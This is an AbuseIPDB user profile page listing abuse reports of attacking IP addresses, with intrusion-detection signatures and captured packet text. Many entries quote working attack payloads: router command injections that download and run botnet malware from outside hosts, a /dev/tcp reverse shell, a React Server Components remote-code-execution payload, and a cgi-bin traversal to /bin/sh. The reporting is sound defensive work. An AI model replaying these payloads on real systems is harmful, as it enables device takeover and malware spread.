NotSure - AbuseIPDB User Profile

JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

User NotSure joined AbuseIPDB in February 2023 and has reported 145 IP addresses.

Standing (weight) is good.

INACTIVE USER

IP	Date	Comment	Categories
🇮🇳 103.175.29.59	06 Jan 2026	SERVER-WEBAPP Netgear DGN1000 series routers authentication bypass attempt (1:44687:3) Time: 2026-0 ... show more SERVER-WEBAPP Netgear DGN1000 series routers authentication bypass attempt (1:44687:3) Time: 2026-01-05 19:48:53 (Src Port: 64188, Dst Port: 80) Packet Text: ... ..... [email protected]..; dd ...P........P. .....GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.175.29.59:58676/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0 show less	Web App Attack
🇦🇺 170.64.193.67	30 Dec 2025	SERVER-WEBAPP React Server Components remote code execution attempt (1:65554:1) Time: 2025-12-29 14 ... show more SERVER-WEBAPP React Server Components remote code execution attempt (1:65554:1) Time: 2025-12-29 14:07:41 (Src Port: 37038, Dst Port: 80) Packet Text: ... ..... ....E.......@[email protected] dd ...P........P. .....------B1767042461223920981 Content-Disposition: form-data; name="0" {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B0\"}","_response":{"_prefix":"test","_formData":{"get":"$1:constructor:constructor"}}} ------B1767042461223920981 Content-Disposition: form-data; name="1" "$@0" ------B1767042461223920981-- show less	Web App Attack
🇮🇹 72.146.234.81	17 Dec 2025	SERVER-WEBAPP TP-Link Archer Router command injection attempt (1:300523:2) Time: 2025-12-17 03:51:4 ... show more SERVER-WEBAPP TP-Link Archer Router command injection attempt (1:300523:2) Time: 2025-12-17 03:51:49 (Src Port: 53174, Dst Port: 80) Packet Text: ... ..... [email protected] dd ...P........P. .....operation=write&country=$(id>`curl -fsSL http://45.11.229.11/bins.sh -o /tmp/.sh \|\| wget -q http://45.11.229.11/bins.sh -O /tmp/.sh; chmod +x /tmp/.sh; /tmp/.sh &`) show less	Web App Attack
🇨🇦 4.229.225.169	16 Dec 2025	Time: 2025-12-16 07:54:05 (Src Port: 40372, Dst Port: 80) Packet Text: ... ..... ....E.......@... ... show more Time: 2025-12-16 07:54:05 (Src Port: 40372, Dst Port: 80) Packet Text: ... ..... ....E.......@....... dd ...P........P. .....------WebKitFormBoundaryx8jO2oVc6SWP3Sad Content-Disposition: form-data; name="0" {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('powershell -c \"40734*40199\"').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}} ------WebKitFormBoundaryx8jO2oVc6SWP3Sad Content-Disposition: form-data; name="1" "$@0" ------WebKitFormBoundaryx8jO2oVc6SWP3Sad Content-Disposition: form-data; name="2" [] ------WebKitFormBoundaryx8jO2oVc6SWP3Sad-- show less	Web App Attack
🇺🇸 216.108.237.50	12 Dec 2025	Time: 2025-12-11 23:29:58 (Src Port: 42738, Dst Port: 80) Packet Text: ... ..... ....E.."....@.. ... show more Time: 2025-12-11 23:29:58 (Src Port: 42738, Dst Port: 80) Packet Text: ... ..... ....E.."[email protected] dd ...P........P. .....POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1 Host: 63.225.36.208:80 Upgrade-Insecure-Requests: 1 Accept: / User-Agent: libredtail-http Connection: keep-alive Content-Type: text/plain Content-Length: 119 show less	Web App Attack
🇧🇬 78.128.114.22	11 Dec 2025	30+ events from this IP between 12/10 15:00- 12/10 18:00 Many attempts on port 108xx range	Hacking
🇮🇳 117.235.123.159	29 Sep 2025	Time 2025-09-28 16:21:13 (Src Port: 43597, Dst Port: 8443) Packet Text: ... ..... ....E.......@.. ... show more Time 2025-09-28 16:21:13 (Src Port: 43597, Dst Port: 8443) Packet Text: ... ..... [email protected].{. dj..M .........P. .....GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://117.235.123.159:37633/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m HTTP/1.0 show less	Web App Attack
🇳🇿 27.252.36.174	18 Sep 2025	Time 2025-09-18 06:30:21 (Src Port: 35034, Dst Port: 80) Packet Text: ... ..... ....E.......@... ... show more Time 2025-09-18 06:30:21 (Src Port: 35034, Dst Port: 80) Packet Text: ... ..... ....E.......@.....$. dd ...P........P. .....GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1 show less	Hacking
🇬🇧 5.66.198.74	08 Sep 2025	Time: 2025-09-05 23:02:57 (Src Port: 52115, Dst Port: 80) SERVER-WEBAPP TP-Link Archer Router comm ... show more Time: 2025-09-05 23:02:57 (Src Port: 52115, Dst Port: 80) SERVER-WEBAPP TP-Link Archer Router command injection attempt (1:300786:1) Packet Text: ... ..... [email protected] dd ...P........P. .....GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1 show less	Hacking
🇦🇺 182.239.174.39	14 May 2025	MALWARE-CNC User-Agent known malicious user-agent string - Mirai (1:58992:1) Time: 2025-05-09 21:29 ... show more MALWARE-CNC User-Agent known malicious user-agent string - Mirai (1:58992:1) Time: 2025-05-09 21:29:02 (Src Port: 43950, Dst Port: 80) Packet Text: ... ..... ....E.......@......' dd ...P........P. .....User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Connection: keep-alive show less	Hacking
🇦🇺 182.239.177.121	24 Apr 2025	MALWARE-CNC User-Agent known malicious user-agent string - Mirai (1:58992:1) Time: 2025-04-23 12:04 ... show more MALWARE-CNC User-Agent known malicious user-agent string - Mirai (1:58992:1) Time: 2025-04-23 12:04:04 (Src Port: 37382, Dst Port: 80) HTTP URI /shell?cd+/tmp;rm+-rf+;wget+31.58.51.98/jaws;sh+/tmp/jaws Packet Text: ... ..... [email protected] dd ...P........P. .....User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive show less	Hacking
🇺🇸 209.141.50.64	24 Apr 2025	SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1) Time: 2025-04-24 05:29:15 (Src ... show more SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1) Time: 2025-04-24 05:29:15 (Src Port: 39188, Dst Port: 9034) Packet Text: ........0.`...E....1........2@D.....#J....orf;cd /tmp; rm -rf mpsl; /bin/busybox wget http://209.141.34.106/20oel/k03ldc.mpsl; chmod +x k03ldc.mpsl; ./k03ldc.mpsl realtek; # show less	Hacking
🇮🇹 84.221.242.62	18 Apr 2025	Time: 2025-04-18 06:51:53 (Src Port: 56997, Dst Port: 80) HTTP URI /shell?cd+/tmp;rm+-rf+;wget+31 ... show more Time: 2025-04-18 06:51:53 (Src Port: 56997, Dst Port: 80) HTTP URI /shell?cd+/tmp;rm+-rf+;wget+31.58.51.98/jaws;sh+/tmp/jaws Packet Text: ... ..... [email protected]..> dd ...P........P. .....User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Connection: keep-alive show less	Hacking
🇮🇳 117.219.142.185	26 Dec 2024	SERVER-WEBAPP Netgear DGN1000 series routers authentication bypass attempt (1:44687:3) Time: 2024-1 ... show more SERVER-WEBAPP Netgear DGN1000 series routers authentication bypass attempt (1:44687:3) Time: 2024-12-25 23:42:49 - (Src Port: 47287, Dst Port: 80) Packet Text: ... ..... ....E..([email protected]... dd ...P........P. ..... show less	Hacking
🇮🇳 202.21.42.108	11 Dec 2024	MALWARE-CNC User-Agent known malicious user-agent string - Mirai (1:58992:1) Time 2024-12-11 06:53: ... show more MALWARE-CNC User-Agent known malicious user-agent string - Mirai (1:58992:1) Time 2024-12-11 06:53:34 (Src Port: 46763, Dst Port: 80) Packet Text: ... ..... ....E.......@.....l dd ...P........P. .....Host: 127.0.0.1:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: /* User-Agent: Hello, World Content-Length: 118 show less	Hacking
🇵🇱 91.193.18.13	04 Dec 2024	Source Port: TCP 47059 / Destination TCP 25 CnC Connected Security Intelligence Event - CnC The hos ... show more Source Port: TCP 47059 / Destination TCP 25 CnC Connected Security Intelligence Event - CnC The host may be under remote control 2024-12-04 06:57:39 Similar event on Internal IPs show less	Hacking
🇻🇳 45.124.95.225	05 Nov 2024	Seen in a callback packet text from IP 146.103.38.222 SERVER-OTHER RealTek UDPServer command inject ... show more Seen in a callback packet text from IP 146.103.38.222 SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1) Time: 2024-11-05 08:49:16 (Src Port: 54576, Dst Port: 9034) Packet Text: ..]....K.._...E....1.......g&.?.-..0#J....orf;cd /tmp; rm -rf main_mpsl; /bin/busybox wget http://45.124.95.225/main_mpsl; chmod +x main_mpsl; ./main_mpsl realtek; # show less	Hacking
🇱🇹 146.103.38.222	05 Nov 2024	SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1) Time: 2024-11-05 08:49:16 (Src ... show more SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1) Time: 2024-11-05 08:49:16 (Src Port: 54576, Dst Port: 9034) Packet Text: ..]....K.._...E....1.......g&.?.-..0#J....orf;cd /tmp; rm -rf main_mpsl; /bin/busybox wget http://45.124.95.225/main_mpsl; chmod +x main_mpsl; ./main_mpsl realtek; # show less	SQL Injection
🇳🇱 213.152.161.30	21 Oct 2024	CnC Time: 2024-10-21 12:49:13 Source Port: 40125, Destination Port: 3306	Hacking
🇯🇵 164.52.24.187	04 Oct 2024	PUA-OTHER XMRig cryptocurrency mining pool connection attempt (1:45549:4) Time: 2024-10-03 12:32:43 ... show more PUA-OTHER XMRig cryptocurrency mining pool connection attempt (1:45549:4) Time: 2024-10-03 12:32:43 (Src Port: 42951, Dst Port: 25) Packet Text: ..]....K.._...E..,[email protected]..?.-......{.=83>............ l.....?.{"id": 1, "jsonrpc": "2.0", "method": "login", "params": { "login": "48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD", "pass": "x", "agent": "XMRig/2.6.0-beta2 (Linux x86_64) libuv/1.8.0 gcc/5.4.0"}} show less	Web App Attack
🇦🇺 209.38.23.48	30 Sep 2024	Time 2024-09-29 02:35:18 (Src Port: 53670, Dst Port: 80) Packet Text: ... ..... ....E..O....@.... ... show more Time 2024-09-29 02:35:18 (Src Port: 53670, Dst Port: 80) Packet Text: ... ..... ....E..O....@....&.0 dd ...P........P. .....<?=base64_decode("emV0YXNheWFuZw==");?> show less	Web App Attack
🇷🇴 45.148.10.238	17 Sep 2024	CnC traffic src port 42208 tcp dest port 443 (https) tcp 2024-09-16 14:50:01	Hacking
🇷🇺 194.113.106.241	06 Sep 2024	Time 2024-09-06 13:23:11 (Src Port: 52495, Dst Port: 9034) Packet Text: ..]....K.._...E..h.1....X ... show more Time 2024-09-06 13:23:11 (Src Port: 52495, Dst Port: 9034) Packet Text: ..]....K.._...E..h.1....X .qj.?.-...#J.T..orf;0<&196;exec 196<>/dev/tcp/194.113.106.241/7777; sh <&196 >&196 2>&196; # show less	SQL Injection
🇩🇪 45.145.42.234	07 Aug 2024	SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1) 5x 2024-08-07 07:57:54 Source ... show more SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1) 5x 2024-08-07 07:57:54 Source Ports UDP 50906,45573, 42614, 43275, 33057, 37465 > Destination port 9034 show less	SQL Injection
🇮🇳 128.199.16.182	17 Jun 2024	Port scanning (Port 3389) on various devices.	Port Scan Port Scan